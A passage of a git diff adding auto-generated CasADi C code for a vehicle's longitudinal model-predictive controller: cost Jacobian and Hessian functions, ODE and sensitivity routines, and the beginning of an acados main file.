+#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s3[16] = {4, 6, 0, 2, 3, 4, 5, 6, 7, 1, 2, 1, 2, 3, 3, 0}; + +/* long_cost_y_fun_jac_ut_xt:(i0[3],i1,i2[6])->(o0[6],o1[4x6,7nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4, a5; + a0=arg[2]? arg[2][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a0=(a0-a1); + a2=arg[0]? arg[0][1] : 0; + a3=casadi_sq(a2); + a4=5.; + a3=(a3/a4); + a4=arg[2]? arg[2][4] : 0; + a5=(a4*a2); + a3=(a3+a5); + a5=6.; + a3=(a3+a5); + a0=(a0-a3); + a3=10.; + a3=(a2+a3); + a0=(a0/a3); + if (res[0]!=0) res[0][0]=a0; + if (res[0]!=0) res[0][1]=a1; + if (res[0]!=0) res[0][2]=a2; + a1=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][3]=a1; + a5=arg[2]? arg[2][3] : 0; + a1=(a1-a5); + if (res[0]!=0) res[0][4]=a1; + a1=arg[1]? arg[1][0] : 0; + if (res[0]!=0) res[0][5]=a1; + a1=(1./a3); + a1=(-a1); + if (res[1]!=0) res[1][0]=a1; + a1=2.0000000000000001e-01; + a2=(a2+a2); + a1=(a1*a2); + a1=(a1+a4); + a1=(a1/a3); + a0=(a0/a3); + a1=(a1+a0); + a1=(-a1); + if (res[1]!=0) res[1][1]=a1; + a1=1.; + if (res[1]!=0) res[1][2]=a1; + if (res[1]!=0) res[1][3]=a1; + if (res[1]!=0) res[1][4]=a1; + if (res[1]!=0) res[1][5]=a1; + if (res[1]!=0) res[1][6]=a1; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_jac_ut_xt(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_jac_ut_xt_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_jac_ut_xt_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_jac_ut_xt_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_jac_ut_xt_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_jac_ut_xt_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_jac_ut_xt_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_jac_ut_xt_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_fun_jac_ut_xt_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_fun_jac_ut_xt_n_out(void) { return 2;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_fun_jac_ut_xt_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_fun_jac_ut_xt_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_fun_jac_ut_xt_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_fun_jac_ut_xt_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_fun_jac_ut_xt_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s2; + case 1: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_jac_ut_xt_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 2; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_hess.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_hess.c new file mode 100644 index 000000000..b9bb530b2 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_hess.c @@ -0,0 +1,197 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_hess_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s3[10] = {4, 4, 0, 0, 1, 3, 3, 2, 1, 2}; + +/* long_cost_y_hess:(i0[3],i1,i2[6],i3[6])->(o0[4x4,3nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a10, a2, a3, a4, a5, a6, a7, a8, a9; + a0=arg[2]? arg[2][0] : 0; + a1=arg[0]? arg[0][1] : 0; + a2=10.; + a2=(a1+a2); + a3=(1./a2); + a3=(a3/a2); + a3=(a0*a3); + if (res[0]!=0) res[0][0]=a3; + a3=(a0/a2); + a4=(a3/a2); + if (res[0]!=0) res[0][1]=a4; + a5=2.0000000000000001e-01; + a6=(a1+a1); + a6=(a5*a6); + a7=arg[3]? arg[3][4] : 0; + a6=(a6+a7); + a6=(a6/a2); + a8=arg[3]? arg[3][2] : 0; + a9=arg[0]? arg[0][0] : 0; + a8=(a8-a9); + a9=casadi_sq(a1); + a10=5.; + a9=(a9/a10); + a10=(a7*a1); + a9=(a9+a10); + a10=6.; + a9=(a9+a10); + a8=(a8-a9); + a8=(a8/a2); + a9=(a8/a2); + a6=(a6+a9); + a6=(a6/a2); + a8=(a8/a2); + a8=(a8/a2); + a6=(a6+a8); + a0=(a0*a6); + a7=(a7*a4); + a0=(a0+a7); + a7=2.; + a3=(a5*a3); + a7=(a7*a3); + a1=(a1+a1); + a5=(a5*a4); + a1=(a1*a5); + a7=(a7-a1); + a0=(a0-a7); + if (res[0]!=0) res[0][2]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_hess(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_hess_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_hess_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_hess_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_hess_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_hess_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_hess_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_hess_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_hess_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_hess_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_hess_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_hess_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_hess_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_hess_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_hess_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_hess_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_ode_fun.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_ode_fun.c new file mode 100644 index 000000000..8bffb06fc --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_ode_fun.c @@ -0,0 +1,149 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_expl_ode_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; + +/* long_expl_ode_fun:(i0[3],i1,i2[6])->(o0[3]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][1]=a0; + a0=arg[1]? arg[1][0] : 0; + if (res[0]!=0) res[0][2]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_expl_ode_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_expl_ode_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_expl_ode_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_expl_ode_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_expl_ode_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_expl_ode_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_expl_ode_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_expl_ode_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_expl_ode_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int long_expl_ode_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_expl_ode_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_expl_ode_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_expl_ode_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_expl_ode_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_expl_ode_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_expl_ode_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_vde_adj.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_vde_adj.c new file mode 100644 index 000000000..b7d1c58a1 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_vde_adj.c @@ -0,0 +1,155 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_expl_vde_adj_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s3[8] = {4, 1, 0, 4, 0, 1, 2, 3}; + +/* long_expl_vde_adj:(i0[3],i1[3],i2,i3[6])->(o0[4]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0; + a0=0.; + if (res[0]!=0) res[0][0]=a0; + a0=arg[1]? arg[1][0] : 0; + if (res[0]!=0) res[0][1]=a0; + a0=arg[1]? arg[1][1] : 0; + if (res[0]!=0) res[0][2]=a0; + a0=arg[1]? arg[1][2] : 0; + if (res[0]!=0) res[0][3]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_adj(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_adj_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_adj_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_adj_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_adj_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_adj_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_adj_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_adj_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_expl_vde_adj_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int long_expl_vde_adj_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_expl_vde_adj_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_expl_vde_adj_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_expl_vde_adj_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_expl_vde_adj_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s0; + case 2: return casadi_s1; + case 3: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_expl_vde_adj_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_adj_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_vde_forw.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_vde_forw.c new file mode 100644 index 000000000..f626223c0 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_model/long_expl_vde_forw.c @@ -0,0 +1,181 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_expl_vde_forw_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[15] = {3, 3, 0, 3, 6, 9, 0, 1, 2, 0, 1, 2, 0, 1, 2}; +static const casadi_int casadi_s2[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s3[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; + +/* long_expl_vde_forw:(i0[3],i1[3x3],i2[3],i3,i4[6])->(o0[3],o1[3x3],o2[3]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][1]=a0; + a0=arg[3]? arg[3][0] : 0; + if (res[0]!=0) res[0][2]=a0; + a0=arg[1]? arg[1][1] : 0; + if (res[1]!=0) res[1][0]=a0; + a0=arg[1]? arg[1][2] : 0; + if (res[1]!=0) res[1][1]=a0; + a0=0.; + if (res[1]!=0) res[1][2]=a0; + a1=arg[1]? arg[1][4] : 0; + if (res[1]!=0) res[1][3]=a1; + a1=arg[1]? arg[1][5] : 0; + if (res[1]!=0) res[1][4]=a1; + if (res[1]!=0) res[1][5]=a0; + a1=arg[1]? arg[1][7] : 0; + if (res[1]!=0) res[1][6]=a1; + a1=arg[1]? arg[1][8] : 0; + if (res[1]!=0) res[1][7]=a1; + if (res[1]!=0) res[1][8]=a0; + a0=arg[2]? arg[2][1] : 0; + if (res[2]!=0) res[2][0]=a0; + a0=arg[2]? arg[2][2] : 0; + if (res[2]!=0) res[2][1]=a0; + a0=1.; + if (res[2]!=0) res[2][2]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_forw(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_forw_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_forw_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_forw_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_forw_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_forw_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_forw_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_expl_vde_forw_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_expl_vde_forw_n_in(void) { return 5;} + +CASADI_SYMBOL_EXPORT casadi_int long_expl_vde_forw_n_out(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_real long_expl_vde_forw_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_expl_vde_forw_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + case 4: return "i4"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_expl_vde_forw_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + case 2: return "o2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_expl_vde_forw_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s0; + case 3: return casadi_s2; + case 4: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_expl_vde_forw_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s0; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_expl_vde_forw_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 5; + if (sz_res) *sz_res = 3; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/main_long.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/main_long.c new file mode 100644 index 000000000..a52250226 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/main_long.c @@ -0,0 +1,216 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + + +// standard +#include +#include +// acados +#include "acados/utils/print.h" +#include "acados/utils/math.h" +#include "acados_c/ocp_nlp_interface.h" 